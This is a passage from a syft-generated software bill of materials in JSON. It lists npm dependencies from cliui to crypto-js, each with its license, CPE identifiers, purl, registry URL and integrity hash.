t-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/cliui/-/cliui-6.0.0.tgz","integrity":"sha512-t6wbgtoCXvAzst7QgXxJYqPt0usEfbgQdftEPbLL/cvv6HPE5VgvqCuAIDR0NgU52ds6rFwqrgakNLrHEjCbrQ==","dependencies":{"string-width":"^4.2.0","strip-ansi":"^6.0.0","wrap-ansi":"^6.2.0"}}},{"id":"6699f516cd09331f","name":"cliui","version":"8.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:cliui:cliui:8.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/cliui@8.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz","integrity":"sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==","dependencies":{"string-width":"^4.2.0","strip-ansi":"^6.0.1","wrap-ansi":"^7.0.0"}}},{"id":"924490c8cb0d8bef","name":"clone","version":"2.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:clone:clone:2.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/clone@2.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/clone/-/clone-2.1.2.tgz","integrity":"sha512-3Pe/CF1Nn94hyhIYpjtiLhdCoEoz0DqQ+988E9gmeEdQZlojxnOb74wctFyuwWQHzqyf9X7C7MG8juUpqBJT8w==","dependencies":null}},{"id":"1cdd74d474651cd1","name":"clsx","version":"2.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:clsx:clsx:2.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/clsx@2.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/clsx/-/clsx-2.1.1.tgz","integrity":"sha512-eYm0QWBtUrBWZWG0d386OGAw16Z995PiOVo2B7bjWSbHedGl5e0ZWaq65kOGgUSNesEIDkB9ISbTg/JK9dhCZA==","dependencies":null}},{"id":"635dabdd9cdc8fd8","name":"cluster-key-slot","version":"1.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:cluster-key-slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cluster-key-slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cluster_key_slot:cluster-key-slot:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cluster_key_slot:cluster_key_slot:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cluster-key:cluster-key-slot:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cluster-key:cluster_key_slot:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cluster_key:cluster-key-slot:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cluster_key:cluster_key_slot:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cluster:cluster-key-slot:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cluster:cluster_key_slot:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/cluster-key-slot@1.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/cluster-key-slot/-/cluster-key-slot-1.1.2.tgz","integrity":"sha512-RMr0FhtfXemyinomL4hrWcYJxmX6deFdCxpJzhDttxgO1+bcCnkk+9drydLVDmAMG7NE6aN/fl4F7ucU/90gAA==","dependencies":null}},{"id":"fcc3d45495abf3bd","name":"color-convert","version":"2.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:color-convert:color-convert:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color-convert:color_convert:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color_convert:color-convert:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color_convert:color_convert:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color:color-convert:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color:color_convert:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/color-convert@2.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz","integrity":"sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==","dependencies":{"color-name":"~1.1.4"}}},{"id":"9d8d6c4ccfd91cbf","name":"color-name","version":"1.1.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:color-name:color-name:1.1.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color-name:color_name:1.1.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color_name:color-name:1.1.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color_name:color_name:1.1.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color:color-name:1.1.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color:color_name:1.1.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/color-name@1.1.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz","integrity":"sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==","dependencies":null}},{"id":"8dfa4f08fc1899a7","name":"color-name","version":"2.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:color-name:color-name:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color-name:color_name:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color_name:color-name:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color_name:color_name:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color:color-name:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:color:color_name:2.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/color-name@2.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/color-name/-/color-name-2.1.0.tgz","integrity":"sha512-1bPaDNFm0axzE4MEAzKPuqKWeRaT43U/hyxKPBdqTfmPF+d6n7FSoTFxLVULUJOmiLp01KjhIPPH+HrXZJN4Rg==","dependencies":null}},{"id":"b96884f4eed4192d","name":"color-string","version":"1.9.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:color-string_project:color-string:1.9.1:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/color-string@1.9.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/color-string/-/color-string-1.9.1.tgz","integrity":"sha512-shrVawQFojnZv6xM40anx4CkoDP+fZsw/ZerEMsW/pyzsRbElpsL/DBVW7q3ExxwusdNXI3lXpuhEZkzs8p5Eg==","dependencies":{"color-name":"^1.0.0","simple-swizzle":"^0.2.2"}}},{"id":"1f15e4f4433605fc","name":"color-string","version":"2.1.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:color-string_project:color-string:2.1.4:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/color-string@2.1.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/color-string/-/color-string-2.1.4.tgz","integrity":"sha512-Bb6Cq8oq0IjDOe8wJmi4JeNn763Xs9cfrBcaylK1tPypWzyoy2G3l90v9k64kjphl/ZJjPIShFztenRomi8WTg==","dependencies":{"color-name":"^2.0.0"}}},{"id":"6feb2abce081a13b","name":"combined-stream","version":"1.0.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:combined-stream:combined-stream:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:combined-stream:combined_stream:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:combined_stream:combined-stream:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:combined_stream:combined_stream:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:combined:combined-stream:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:combined:combined_stream:1.0.8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/combined-stream@1.0.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz","integrity":"sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==","dependencies":{"delayed-stream":"~1.0.0"}}},{"id":"68cb0d0425b8ec71","name":"commander","version":"10.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:commander:commander:10.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/commander@10.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/commander/-/commander-10.0.1.tgz","integrity":"sha512-y4Mg2tXshplEbSGzx7amzPwKKOCGuoSRP/CjEdwwk0FOGlUbq6lKuoyDZTNZkmxHdJtp54hdfY/JUrdL7Xfdug==","dependencies":null}},{"id":"6ef23c8bf6c64c11","name":"commander","version":"4.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:commander:commander:4.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/commander@4.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/commander/-/commander-4.1.1.tgz","integrity":"sha512-NOKm8xhkzAjzFx8B2v5OAHT+u5pRQc2UCa2Vq9jYL/31o2wi9mxBA7LIFs3sV5VSC49z6pEhfbMULvShKj26WA==","dependencies":null}},{"id":"ee26fc9f2aa2694f","name":"concat-stream","version":"1.6.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:concat-stream:concat-stream:1.6.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:concat-stream:concat_stream:1.6.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:concat_stream:concat-stream:1.6.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:concat_stream:concat_stream:1.6.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:concat:concat-stream:1.6.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:concat:concat_stream:1.6.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/concat-stream@1.6.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz","integrity":"sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw==","dependencies":{"buffer-from":"^1.0.0","inherits":"^2.0.3","readable-stream":"^2.2.2","typedarray":"^0.0.6"}}},{"id":"f8adcbfce494f378","name":"config-chain","version":"1.1.13","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:config-chain:config-chain:1.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:config-chain:config_chain:1.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:config_chain:config-chain:1.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:config_chain:config_chain:1.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:config:config-chain:1.1.13:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:config:config_chain:1.1.13:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/config-chain@1.1.13","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/config-chain/-/config-chain-1.1.13.tgz","integrity":"sha512-qj+f8APARXHrM0hraqXYb2/bOVSV4PvJQlNZ/DVj0QrmNM2q2euizkeuVckQ57J+W0mRH6Hvi+k50M4Jul2VRQ==","dependencies":{"ini":"^1.3.4","proto-list":"~1.2.1"}}},{"id":"5a8a76bf321e2afc","name":"content-disposition","version":"0.5.4","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:content-disposition:content-disposition:0.5.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:content-disposition:content_disposition:0.5.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:content_disposition:content-disposition:0.5.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:content_disposition:content_disposition:0.5.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:content:content-disposition:0.5.4:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:content:content_disposition:0.5.4:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/content-disposition@0.5.4","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz","integrity":"sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ==","dependencies":{"safe-buffer":"5.2.1"}}},{"id":"e6774efb67a1cd80","name":"content-type","version":"1.0.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:content-type:content-type:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:content-type:content_type:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:content_type:content-type:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:content_type:content_type:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:content:content-type:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:content:content_type:1.0.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/content-type@1.0.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz","integrity":"sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA==","dependencies":null}},{"id":"dabea341270367ac","name":"cookie","version":"0.7.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:cookie:cookie:0.7.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/cookie@0.7.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/cookie/-/cookie-0.7.2.tgz","integrity":"sha512-yki5XnKuf750l50uGTllt6kKILY4nQ1eNIQatoXEByZ5dWgnKqbnqmTrBE5B4N7lrMJKQ2ytWMiTO2o0v6Ew/w==","dependencies":null}},{"id":"c3cdc836e23cbee4","name":"cookie-signature","version":"1.0.7","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:cookie-signature_project:cookie-signature:1.0.7:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/cookie-signature@1.0.7","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.7.tgz","integrity":"sha512-NXdYc3dLr47pBkpUCHtKSwIOQXLVn8dZEuywboCOJY/osA0wFSLlSawr3KN8qXJEyX66FcONTH8EIlVuK0yyFA==","dependencies":null}},{"id":"9bfb1fb9a1cd315e","name":"core-util-is","version":"1.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:core-util-is:core-util-is:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:core-util-is:core_util_is:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:core_util_is:core-util-is:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:core_util_is:core_util_is:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:core-util:core-util-is:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:core-util:core_util_is:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:core_util:core-util-is:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:core_util:core_util_is:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:core:core-util-is:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:core:core_util_is:1.0.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/core-util-is@1.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz","integrity":"sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==","dependencies":null}},{"id":"c8f0caa18c740c23","name":"cors","version":"2.8.6","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:cors:cors:2.8.6:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/cors@2.8.6","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/cors/-/cors-2.8.6.tgz","integrity":"sha512-tJtZBBHA6vjIAaF6EnIaq6laBBP9aq/Y3ouVJjEfoHbRBcHBAHYcMh/w8LDrk2PvIMMq8gmopa5D4V8RmbrxGw==","dependencies":{"object-assign":"^4","vary":"^1"}}},{"id":"cbf693155383c51f","name":"coverallsapp/github-action","version":"master","type":"github-action","foundBy":"github-actions-usage-cataloger","locations":[{"path":"/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml","accessPath":"/node_modules/@ungap/structured-clone/.github/workflows/node.js.yml","annotations":{"evidence":"primary"}}],"licenses":[],"language":"","cpes":[{"cpe":"cpe:2.3:a:coverallsapp\\/github-action:coverallsapp\\/github-action:master:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:coverallsapp\\/github-action:coverallsapp\\/github_action:master:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:coverallsapp\\/github_action:coverallsapp\\/github-action:master:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:coverallsapp\\/github_action:coverallsapp\\/github_action:master:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:coverallsapp\\/github:coverallsapp\\/github-action:master:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:coverallsapp\\/github:coverallsapp\\/github_action:master:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:github/coverallsapp/github-action@master","metadataType":"github-actions-use-statement","metadata":{"value":"coverallsapp/github-action@master"}},{"id":"1ef521ded724ae55","name":"cross-fetch","version":"3.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:cross-fetch_project:cross-fetch:3.2.0:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/cross-fetch@3.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/cross-fetch/-/cross-fetch-3.2.0.tgz","integrity":"sha512-Q+xVJLoGOeIMXZmbUK4HYk+69cQH6LudR0Vu/pRm2YlU/hDV9CiS0gKUMaWY5f2NeUH9C1nV3bsTlCo0FsTV1Q==","dependencies":{"node-fetch":"^2.7.0"}}},{"id":"043761526fd95886","name":"cross-spawn","version":"7.0.6","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:cross-spawn:cross-spawn:7.0.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cross-spawn:cross_spawn:7.0.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cross_spawn:cross-spawn:7.0.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cross_spawn:cross_spawn:7.0.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cross:cross-spawn:7.0.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:cross:cross_spawn:7.0.6:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/cross-spawn@7.0.6","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz","integrity":"sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==","dependencies":{"path-key":"^3.1.0","shebang-command":"^2.0.0","which":"^2.0.1"}}},{"id":"2eb6177b3fd9fb78","name":"crypto-js","version":"4.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-